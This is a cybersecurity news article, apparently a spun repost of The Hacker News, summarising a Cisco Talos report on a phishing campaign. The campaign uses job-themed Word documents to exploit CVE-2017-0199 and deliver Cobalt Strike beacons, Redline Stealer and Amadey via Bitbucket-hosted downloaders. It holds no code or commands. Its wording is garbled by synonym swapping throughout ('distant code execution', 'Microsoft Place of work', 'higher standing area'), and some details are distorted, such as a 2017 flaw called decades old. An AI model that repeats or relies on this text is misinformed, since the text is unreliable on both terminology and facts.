A social engineering marketing campaign leveraging job-themed lures is weaponizing a decades-previous distant code execution flaw in Microsoft Business to deploy Cobalt Strike beacons on compromised hosts.
“The payload found is a leaked version of a Cobalt Strike beacon,” Cisco Talos scientists Chetan Raghuprasad and Vanja Svajcer explained in a new assessment printed Wednesday.
“The beacon configuration contains instructions to complete focused procedure injection of arbitrary binaries and has a higher standing area configured, exhibiting the redirection approach to masquerade the beacon’s targeted visitors.”
The destructive exercise, learned in August 2022, attempts to exploit the vulnerability CVE-2017-0199, a distant code execution issue in Microsoft Place of work, that allows an attacker to consider manage of an impacted technique.
The entry vector for the attack is a phishing email containing a Microsoft Word attachment that employs job-themed lures for roles in the U.S. govt and Public Company Association, a trade union based mostly in New Zealand.
Cobalt Strike beacons are far from the only malware samples deployed, for Cisco Talos explained it has also observed the utilization of the Redline Stealer and Amadey botnet executables as payloads at the other end of the attack chain.
Calling the attack methodology “highly modularized,” the cybersecurity corporation said the attack also stands out for its use of Bitbucket repositories to host malicious information that serves as a setting up position for downloading a Windows executable accountable for deploying the Cobalt Strike DLL beacon.
In an substitute attack sequence, the Bitbucket repository features as a conduit to supply obfuscated VB and PowerShell downloader scripts to put in the beacon hosted on a different Bitbucket account.
“This campaign is a typical instance of a threat actor employing the method of creating and executing destructive scripts in the victim’s procedure memory,” the researchers stated.
“Organizations should be consistently vigilant on the Cobalt Strike beacons and put into action layered protection capabilities to thwart the attacker’s makes an attempt in the previously stage of the attack’s infection chain.”
Found this short article intriguing? Stick to THN on Facebook, Twitter and LinkedIn to read a lot more distinctive content we write-up.
Some parts of this article are sourced from:
thehackernews.com